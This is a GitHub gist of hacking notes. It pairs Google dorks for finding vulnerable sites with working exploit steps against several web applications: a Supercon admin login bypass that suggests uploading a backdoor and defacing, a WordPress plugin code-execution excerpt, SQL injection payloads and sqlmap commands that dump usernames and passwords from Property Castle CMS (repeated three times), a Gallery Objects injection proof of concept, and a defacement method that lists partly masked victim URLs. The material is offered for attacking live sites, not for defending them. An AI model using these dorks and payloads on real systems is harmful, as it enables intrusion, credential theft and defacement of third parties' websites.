Created
November 5, 2015 16:21
-
-
Save dreadpiratesr/2dab641a16c2d9bad7c9 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Exploit Title: Supercon Direct login to admin panel without entering password | |
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices” | |
Product Description | |
——————- | |
Supercon delivers high quality, reliable and cost-effective IT services to customers globally. | |
We provide world-class technology services by constantly exploring and implementing innovative | |
solutions that drive long-term value to our customers. We have been providing solutions to clients | |
across the globe for more than 5 years and boast of our extensive | |
experience on website designing and development projects. | |
Vulnerability Details | |
——————— | |
First type the dork [inurl:/webadmin/login.php intext:“Supercon Infoservices”] | |
Then after find the site in which their is written Copyright © [Version] Supercon Infoservices(P) Ltd. in the footer | |
Now, go to it’s admin page http://www.targetsite.com/webadmin/login.php | |
After opening the admin panel . Follow this link http://www.targetsite.com/webadmin/manage-gallery.php | |
And voila you will be directly login into the admin panel and you can also upload your backdoor and deface :) . | |
Exploit Title: Wordpress Better-wp-security Plugin Remote Code Execution | |
Google Dork : inurl:wp-content/plugins/better-wp-security | |
Location : http://site.com/wp-content/plugins/better-wp-security/better-wp-security.php | |
Vulnerability is also triggered in: http://site.com/wp-content/plugins/better-wp-security/core/class-itsec-core.php | |
public function admin_tooltip_ajax() { | |
global $itsec_globals; | |
if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( | |
sanitize_text_field( $_POST['nonce'] ), 'itsec_tooltip_nonce' ) ) { | |
die (); | |
} | |
if ( sanitize_text_field( $_POST['module'] ) == 'close' ) { | |
$data = $itsec_globals['data']; | |
$data['tooltips_dismissed'] = true; | |
update_site_option( 'itsec_data', $data ); | |
} else { | |
call_user_func_array( $this->tooltip_modules[ sanitize_text_field( | |
$_POST['module'] ) ]['callback'], array() ); | |
} | |
die(); // this is required to return a proper result | |
} | |
Exploit Title: Property Castle CMS post SQL injection | |
Google Dork: inurl:“/cms/cms.php?link_id=” | |
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+ | |
we will have database name | |
2- we search “contact us” page | |
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example) | |
4- we use sqlmap tool now and inject it with POST method | |
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ] | |
#admin page: http://website/admin/index.php | |
Exploit Title: Property Castle CMS post SQL injection | |
Google Dork: inurl:“/cms/cms.php?link_id=” | |
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+ | |
we will have database name | |
2- we search “contact us” page | |
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example) | |
4- we use sqlmap tool now and inject it with POST method | |
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ] | |
#admin page: http://website/admin/index.php | |
Exploit Title: Property Castle CMS post SQL injection | |
Google Dork: inurl:“/cms/cms.php?link_id=” | |
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+ | |
we will have database name | |
2- we search “contact us” page | |
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example) | |
4- we use sqlmap tool now and inject it with POST method | |
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ] | |
#admin page: http://website/admin/index.php | |
Exploit Title : WordPress Gallery Objects 0.4 SQL Injection | |
Dork Google: inurl:/admin-ajax.php?action=go_view_object | |
###################### | |
Poc via Browser: | |
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html | |
sqlmap: | |
sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid | |
--- | |
Place: GET | |
Parameter: viewid | |
Type: boolean-based blind | |
Title: AND boolean-based blind - WHERE or HAVING clause | |
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html | |
--- | |
##################### | |
Polish CMS - SQL Injection | |
{-} Vulnerable Versions => All Versions So Far. | |
{x} Google Dork:: 1 => inurl:index.php?op=galeria id= site:pl | |
{x} Google Dork:: 2 => inurl:new/index.php?op=galeria id= site:pl | |
——————————————————————————————————————————– | |
File: | |
index.php {HomePage} | |
Vulnerable Parameters: | |
[id] , [j] , [s] , [lang] | |
Administration Panel: | |
/admin/ | |
Exploit Title: PRIVATE CSR | |
Google Dork : inurl:/“config/config.izo” | |
# Priv8 SCR Editors | |
# | |
####################################################### | |
# Use Editors To Edit Config Files And Deafce The Site Via CSR Editors. | |
####################################################### | |
# | |
# [+] Example: | |
#http://lom-radioX.com/config/config.izo | |
#http://kesbangpolbuXlukumba.info/config/config.izo | |
#http://www.mirgosXtinits.ru/config/config.izo | |
#http://sacredodysXsey.com/config/config.izo | |
#http://www.biohXgienica.com/config/config.izo | |
####################################################### | |
# [+] Deface Page: www.site.com/config/tar.tmp | |
####################################################### | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment